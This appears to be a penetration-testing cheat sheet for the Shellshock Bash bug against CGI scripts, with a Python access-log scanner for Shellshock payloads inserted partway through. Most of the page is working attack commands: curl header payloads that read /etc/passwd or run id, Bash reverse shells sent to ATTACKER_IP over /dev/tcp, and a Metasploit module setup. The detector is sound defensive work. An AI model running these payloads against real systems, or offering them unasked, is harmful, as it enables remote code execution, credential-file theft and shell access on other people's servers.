# Shellshock CGI

## Overview

* Affects unpatched Bash versions up to 4.3
* Exploits Bash's handling of function definitions passed through environment variables: commands appended after the function body are executed when Bash starts
* Common in CGI scripts (the web server copies request headers into environment variables before invoking the script) and in IoT devices

***

## Discovery

### Find CGI Scripts

```bash
gobuster dir -u http://TARGET/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi,sh,pl

# Common CGI paths
/cgi-bin/
/cgi-sys/
/cgi-mod/
```

### Common Vulnerable Scripts

```
/cgi-bin/test.cgi
/cgi-bin/status
/cgi-bin/admin.cgi
/cgi-bin/test-cgi
/cgi-bin/printenv
```

***

## Test for Vulnerability

### Via User-Agent Header

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://TARGET/cgi-bin/script.cgi
```

### Via Cookie Header

```bash
curl -H 'Cookie: () { :; }; echo ; /bin/id' http://TARGET/cgi-bin/script.cgi
```

### Via Referer Header

```bash
curl -H 'Referer: () { :; }; echo ; /bin/id' http://TARGET/cgi-bin/script.cgi
```
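Defender-side counterpart to the header tests above, added here and not part of the original page: a Python scanner that flags the `() {` function-definition prologue in the request line, Referer and User-Agent fields of Apache combined-format access logs. The log lines are constructed samples; the regexes, field names and `Hit` type are my assumptions, not part of any tool the page mentions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent".
# Cookie is not logged by default, so Cookie-borne payloads need a custom LogFormat to be seen.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Every Shellshock payload opens with the Bash function-definition prologue "() {";
# Bash accepts optional whitespace between the tokens, so match it loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

@dataclass
class Hit:
    host: str
    time: str
    field: str   # "request", "referer" or "agent"
    status: str  # a 500 beside a payload often means the command ran but broke the CGI headers
    value: str

def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def find_shellshock(lines: List[str]) -> List[Hit]:
    """One Hit per logged field that carries a function-definition prologue."""
    hits: List[Hit] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not combined format or truncated: skip rather than crash
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(Hit(rec["host"], rec["time"], field, rec["status"], rec[field]))
    return hits

# Constructed sample log: two benign requests (one with parentheses in the UA), two carrying the page's test payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2024:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2024:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 1207 "-" "() { :; }; echo ; echo ; /bin/id"',
    '10.0.0.9 - - [10/Oct/2024:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :; }; echo ; /bin/id" "curl/7.68.0"',
    '10.0.0.7 - - [10/Oct/2024:13:56:02 +0000] "GET /cgi-bin/printenv HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(f"{h.time} {h.host} {h.field}={h.value!r} status={h.status}")
```

Feed it real lines with `find_shellshock(open("access.log").readlines())`; benign user agents containing parentheses (browser UAs) do not trip the pattern because it requires an empty `()` pair.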

***

## Exploitation

### Command Execution

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/id' http://TARGET/cgi-bin/script.cgi
```

### Reverse Shell

```bash
# Bash reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' http://TARGET/cgi-bin/script.cgi

# With listener
nc -lvnp PORT
```

### Alternative Reverse Shell

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -c "/bin/bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' http://TARGET/cgi-bin/script.cgi
```

***

## Nmap Script

```bash
nmap -sV -p 80,443,8080 --script http-shellshock --script-args uri=/cgi-bin/script.cgi TARGET
```

***

## Metasploit

```bash
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS TARGET
set TARGETURI /cgi-bin/script.cgi
set LHOST ATTACKER_IP
run
```

***

## Local Test

```bash
# Check whether the local Bash is vulnerable
env x='() { :;}; echo vulnerable' bash -c "echo test"

# If "vulnerable" prints before "test", the system is affected;
# patched Bash prints only "test" (and may warn that it ignored the function definition attempt)
```
